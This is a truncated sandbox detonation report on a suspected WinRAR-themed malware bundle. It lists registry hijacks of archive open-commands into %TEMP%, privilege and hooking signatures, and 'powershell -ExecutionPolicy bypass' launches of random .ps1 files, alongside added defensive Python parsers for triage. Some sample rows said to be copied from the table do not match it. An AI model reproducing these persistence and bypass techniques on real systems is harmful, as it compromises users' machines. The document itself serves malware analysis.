Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
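The rows above are the file-association and shell-extension keys a WinRAR installation normally writes (the key names and the "WinRAR archive" type string are WinRAR's own). What makes them worth a second look in this detonation is the writer: a WinRAR.exe unpacked under %TEMP% by the sample, which also registers a shell\open\command that now points into that directory, so every double-click on a .zip or .rev file would launch the bundled binary. The following is an added example, not part of the sandbox report: a Python triage script that parses rows in this report's format and flags Explorer-loaded handlers (shellex ContextMenuHandlers, DragDropHandlers, PropertySheetHandlers, DropHandler) and shell\open\command values that are registered by, or point at, a binary in a user-writable directory. The sample rows are copied from the table above; the two control rows are constructed, and the list of user-writable directories is an assumption to tune for your environment.

```python
import re
from dataclasses import dataclass

# Registry rows copied from the "Modifies registry class" table above.
# Sandbox paths in this report contain no spaces, so the process and target
# columns are single tokens; the row parser below relies on that.
SAMPLE_ROWS = r"""
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
"""

# Constructed control rows (not from the report). First: the same handler written by
# a WinRAR under Program Files (8.3 short name so the path stays one token); second:
# a trusted writer registering an open command that points into a user profile.
CONTROL_ROWS = r"""
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\PROGRA~1\WinRAR\WinRAR.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\svc\\update.exe\" \"%1\"" C:\Windows\regedit.exe N/A
"""

# One table row: operation, key, optional quoted value, process, target.
ROW = re.compile(
    r'^(?P<op>Key created|Set value \((?P<vtype>\w+)\))\s+'
    r'(?P<key>\\REGISTRY\\\S+?)'
    r'(?:\s+=\s+"(?P<value>(?:[^"\\]|\\.)*)")?'
    r'\s+(?P<process>\S+)\s+(?P<target>\S+)$'
)

# Locations under HKLM\SOFTWARE\Classes that make Explorer load a COM handler
# (shellex\*) or run a command (shell\open\command) on the user's behalf.
SHELL_HOOK = re.compile(
    r"\\Classes\\[^ ]*?\\(?:shellex\\(?:ContextMenuHandlers|DragDropHandlers|"
    r"PropertySheetHandlers|DropHandler)|shell\\open\\command)", re.I)

# Directories a standard user can write to (assumption; tune per environment).
USER_WRITABLE = re.compile(r"\\(?:AppData\\(?:Local\\Temp|Roaming)|Users\\Public)\\", re.I)


@dataclass
class Finding:
    key: str
    process: str
    reason: str


def parse_rows(text: str) -> list[dict]:
    rows = []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW.match(line)
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        rows.append(m.groupdict())
    return rows


def unescape(value: str) -> str:
    """Undo the report's C-style escaping of quotes and backslashes in values."""
    return value.replace('\\"', '"').replace("\\\\", "\\")


def flag_shell_hooks(rows: list[dict]) -> list[Finding]:
    findings = []
    for r in rows:
        if not SHELL_HOOK.search(r["key"]):
            continue
        if USER_WRITABLE.search(r["process"]):
            reason = "shell hook registered by process in user-writable dir"
        elif r["value"] and USER_WRITABLE.search(unescape(r["value"])):
            reason = "shell hook target in user-writable dir"
        else:
            continue
        findings.append(Finding(r["key"], r["process"], reason))
    return findings


if __name__ == "__main__":
    for f in flag_shell_hooks(parse_rows(SAMPLE_ROWS + CONTROL_ROWS)):
        print(f"{f.reason}: {f.key} <- {f.process}")
```

The rule keys on where the registering process and the handler target live, not on the keys themselves, which is why the first control row (the same CLSID written from Program Files) is not flagged while the second (a trusted process pointing shell\open\command into AppData\Roaming) is.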

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe

"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 2952

Network

Country Destination Domain Proto
US 8.8.8.8:53 notifier.rarlab.com udp
DE 51.195.68.172:80 notifier.rarlab.com tcp
DE 51.195.68.172:443 notifier.rarlab.com tcp
US 8.8.8.8:53 172.68.195.51.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
DE 51.195.68.172:443 notifier.rarlab.com tcp
US 8.8.8.8:53 193.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 190.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp
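Most rows in the Network tables of this report are PTR queries (in-addr.arpa and ip6.arpa names) sent to 8.8.8.8:53. They are not contacts in themselves; they name addresses the host talked to, and reverse lookups that match no TCP destination in the same table are usually the win10 image's own background traffic rather than the sample's. The only direct connections in this table are the notifier.rarlab.com TCP sessions (rarlab.com is WinRAR's vendor domain) and 52.111.236.23:443. As an added example, not part of the report, the Python below parses rows in this format, decodes reverse-lookup names back into addresses, and marks which of them correspond to a destination actually contacted in the same table. The input is copied from the table above plus the ip6.arpa row from the behavioral21 table; the same function applies to every Network table in the report.

```python
import ipaddress

# Rows copied from the behavioral14 Network table above, plus the ip6.arpa row
# from behavioral21. Rows with no domain column have only three fields.
SAMPLE_NETWORK = """
US 8.8.8.8:53 notifier.rarlab.com udp
DE 51.195.68.172:80 notifier.rarlab.com tcp
DE 51.195.68.172:443 notifier.rarlab.com tcp
US 8.8.8.8:53 172.68.195.51.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
"""


def parse_network(text: str) -> list[dict]:
    """Parse 'Country Destination [Domain] Proto' rows into dicts."""
    rows = []
    for line in text.strip().splitlines():
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            country, dest, proto = parts
            domain = None
        else:
            raise ValueError(f"unexpected row: {line!r}")
        host, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": host, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def ptr_to_ip(name: str):
    """Turn a reverse-lookup name back into the address it asks about, else None."""
    labels = name.lower().rstrip(".").split(".")
    try:
        if labels[-2:] == ["in-addr", "arpa"] and len(labels) == 6:
            # four octets, least significant first
            return str(ipaddress.IPv4Address(".".join(labels[3::-1])))
        if labels[-2:] == ["ip6", "arpa"] and len(labels) == 34:
            # thirty-two hex nibbles, least significant first
            return str(ipaddress.IPv6Address(int("".join(labels[31::-1]), 16)))
    except ValueError:
        return None
    return None


def classify(rows: list[dict]):
    """Separate real connections from the DNS rows, and tie PTR names to contacts."""
    contacts = [r for r in rows if not (r["proto"] == "udp" and r["port"] == 53)]
    contact_ips = {r["ip"] for r in contacts}
    lookups = []
    for r in rows:
        if r["proto"] == "udp" and r["port"] == 53 and r["domain"]:
            ip = ptr_to_ip(r["domain"])
            lookups.append({"name": r["domain"],
                            "kind": "forward" if ip is None else "reverse",
                            "ip": ip,
                            "seen": ip in contact_ips})
    return contacts, lookups


if __name__ == "__main__":
    contacts, lookups = classify(parse_network(SAMPLE_NETWORK))
    for c in contacts:
        print(f"contact  {c['ip']}:{c['port']}/{c['proto']} {c['domain'] or ''}")
    for l in lookups:
        tag = "matches a contact" if l["seen"] else "no matching contact"
        print(f"{l['kind']:8} {l['name']} -> {l['ip']} ({tag})")
```

In this table 172.68.195.51.in-addr.arpa decodes to 51.195.68.172, the notifier.rarlab.com address the process then connected to, while 172.178.17.96.in-addr.arpa decodes to an address that never appears as a destination, the pattern to expect from reverse lookups the OS performs on its own.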

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\QsVakRcJSHTg.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Data\QsVakRcJSHTg.ps1

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x308

Network

Country Destination Domain Proto
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp

Files

memory/3356-5-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp

memory/3356-4-0x0000014A38C10000-0x0000014A38C32000-memory.dmp

memory/3356-6-0x0000014A38A60000-0x0000014A38A70000-memory.dmp

memory/3356-7-0x0000014A38A60000-0x0000014A38A70000-memory.dmp

memory/3356-10-0x0000014A512E0000-0x0000014A51356000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnusit1r.t20.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3356-31-0x0000014A38A60000-0x0000014A38A70000-memory.dmp

memory/3356-37-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp
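Every PowerShell detonation in this report lists the same dropped file, __PSScriptPolicyTest_<random>.ps1 in %TEMP%, with MD5 c4ca4238a0b923820dcc509a6f75849b, which is the MD5 of the single character 1 (the SHA-1 and SHA-256 values match that byte as well). That file is PowerShell's own AppLocker/WDAC script-policy probe, written when the host starts, so these Files sections show the .ps1 payloads writing nothing of their own to disk during the run; the remaining entries are memory-region dumps taken from the powershell.exe process. As an added example, not part of the report, the Python below parses a Files section in this format, separates memory dumps (computing region sizes and collapsing repeated dumps of one region) from dropped files, and attributes dropped files to known tooling content by re-hashing that content. The input is copied from the behavioral17 section above; the same check applies unchanged to the later PowerShell detonations.

```python
import hashlib
import re

# Files section copied from the behavioral17 detonation above.
FILES_SECTION = r"""
memory/3356-5-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp
memory/3356-4-0x0000014A38C10000-0x0000014A38C32000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pnusit1r.t20.ps1
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
memory/3356-37-0x00007FFE62340000-0x00007FFE62D2C000-memory.dmp
"""

# File contents explained by the tooling rather than the sample. PowerShell writes
# the one-character script "1" to %TEMP% as __PSScriptPolicyTest_<random>.ps1 when
# it evaluates AppLocker/WDAC script policy. Extend this table with your own entries.
KNOWN_CONTENT = {b"1": "PowerShell script-policy probe, not sample-authored"}

MEM = re.compile(r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
                 r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$")
HASH = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
ALGS = ("md5", "sha1", "sha256", "sha512")


def hash_all(data: bytes) -> dict[str, str]:
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ALGS}


def parse_files(text: str):
    """Split a Files section into memory-dump regions and dropped files with hashes."""
    dumps, dropped = [], []
    for line in text.strip().splitlines():
        line = line.strip()
        if not line:
            continue
        m = MEM.match(line)
        if m:
            start, end = int(m["start"], 16), int(m["end"], 16)
            dumps.append({"pid": int(m["pid"]), "seq": int(m["seq"]),
                          "start": start, "size": end - start})
            continue
        h = HASH.match(line)
        if h:
            if not dropped:
                raise ValueError(f"hash line before any file path: {line!r}")
            dropped[-1]["hashes"][h[1].lower()] = h[2].lower()
            continue
        dropped.append({"path": line, "hashes": {}})
    return dumps, dropped


def identify(dropped: list[dict]) -> list[dict]:
    """Attribute a dropped file when every digest the report gives matches known content."""
    for f in dropped:
        f["verdict"] = "unknown content"
        for content, label in KNOWN_CONTENT.items():
            expected = hash_all(content)
            if f["hashes"] and all(f["hashes"][a] == expected[a] for a in f["hashes"]):
                f["verdict"] = label
    return dropped


def distinct_regions(dumps: list[dict]) -> dict:
    """Collapse repeated dumps of one (pid, base) region into a single entry."""
    regions = {}
    for d in dumps:
        r = regions.setdefault((d["pid"], d["start"]),
                               {"size": d["size"], "dumps": 0, "seqs": []})
        r["dumps"] += 1
        r["seqs"].append(d["seq"])
    return regions


if __name__ == "__main__":
    dumps, dropped = parse_files(FILES_SECTION)
    for (pid, base), r in distinct_regions(dumps).items():
        print(f"pid {pid} base 0x{base:016X} size 0x{r['size']:X} "
              f"dumped {r['dumps']}x (seq {r['seqs']})")
    for f in identify(dropped):
        print(f"{f['path']}: {f['verdict']}")
```

Requiring every reported digest to match, rather than MD5 alone, avoids attributing a file on a weak hash; a single mismatching digest means the bytes differ from the known content.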

Analysis: behavioral21

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\Qt5Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\Qt5Core.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 63.141.182.52.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

113s

Max time network

140s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\9syz0JDU8L0Z.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\9syz0JDU8L0Z.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp

Files

memory/4872-4-0x000002D670530000-0x000002D670552000-memory.dmp

memory/4872-5-0x00007FFF60DF0000-0x00007FFF617DC000-memory.dmp

memory/4872-6-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-8-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-10-0x000002D670BC0000-0x000002D670C36000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pbfvhjcj.fgz.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4872-33-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-34-0x00007FFF60DF0000-0x00007FFF617DC000-memory.dmp

memory/4872-35-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-36-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

memory/4872-37-0x000002D670AB0000-0x000002D670AC0000-memory.dmp

Analysis: behavioral29

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

114s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\UNRAR64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\UNRAR64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 24.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 189.178.17.96.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

118s

Max time network

136s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\RIBTwoUATqEp.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp

Files

memory/1364-4-0x000002AF3AAC0000-0x000002AF3AAE2000-memory.dmp

memory/1364-5-0x00007FFAABF20000-0x00007FFAAC90C000-memory.dmp

memory/1364-8-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-9-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-10-0x000002AF53270000-0x000002AF532E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e5pncfkb.0xq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1364-31-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-34-0x00007FFAABF20000-0x00007FFAAC90C000-memory.dmp

memory/1364-35-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-36-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

memory/1364-37-0x000002AF3AA30000-0x000002AF3AA40000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

117s

Max time network

137s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\WtFlkRqeJ61k.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp

Files

memory/3012-4-0x0000019B0AA10000-0x0000019B0AA32000-memory.dmp

memory/3012-5-0x00007FFDDEC80000-0x00007FFDDF66C000-memory.dmp

memory/3012-6-0x0000019B23050000-0x0000019B23060000-memory.dmp

memory/3012-9-0x0000019B23160000-0x0000019B231D6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q2ur3mid.bgj.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3012-32-0x0000019B23050000-0x0000019B23060000-memory.dmp

memory/3012-33-0x00007FFDDEC80000-0x00007FFDDF66C000-memory.dmp

memory/3012-34-0x0000019B23050000-0x0000019B23060000-memory.dmp

memory/3012-35-0x0000019B23050000-0x0000019B23060000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

128s

Max time network

136s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4808 wrote to memory of 696 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4808 wrote to memory of 696 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4808 wrote to memory of 696 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMICON2.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

Platform

win10-20240221-en

Max time kernel

119s

Max time network

137s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\VO1DaL46eflm.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 172.178.17.96.in-addr.arpa udp

Files

memory/4716-4-0x00000228F1290000-0x00000228F12B2000-memory.dmp

memory/4716-5-0x00007FFF28DA0000-0x00007FFF2978C000-memory.dmp

memory/4716-6-0x00000228F1110000-0x00000228F1120000-memory.dmp

memory/4716-9-0x00000228F1900000-0x00000228F1976000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtdoqz04.3ky.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4716-30-0x00000228F1110000-0x00000228F1120000-memory.dmp

memory/4716-33-0x00007FFF28DA0000-0x00007FFF2978C000-memory.dmp

memory/4716-34-0x00000228F1110000-0x00000228F1120000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240214-en

Max time kernel

118s

Max time network

129s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMZIP64.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\WCMZIP64.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 96.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 177.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:22

Platform

win10-20240221-en

Max time kernel

64s

Max time network

90s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\NcHGDdjDw8Ov.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\Tools\NcHGDdjDw8Ov.ps1

Network

Country Destination Domain Proto
US 8.8.8.8:53 129.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

memory/4372-4-0x000001613B3F0000-0x000001613B412000-memory.dmp

memory/4372-7-0x000001613B5A0000-0x000001613B616000-memory.dmp

memory/4372-16-0x00007FFAB2650000-0x00007FFAB303C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bf25stib.u4r.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4372-17-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-18-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-32-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-34-0x00007FFAB2650000-0x00007FFAB303C000-memory.dmp

memory/4372-35-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-36-0x0000016122E60000-0x0000016122E70000-memory.dmp

memory/4372-37-0x0000016122E60000-0x0000016122E70000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-02-23 10:15

Reported

2024-02-23 10:23

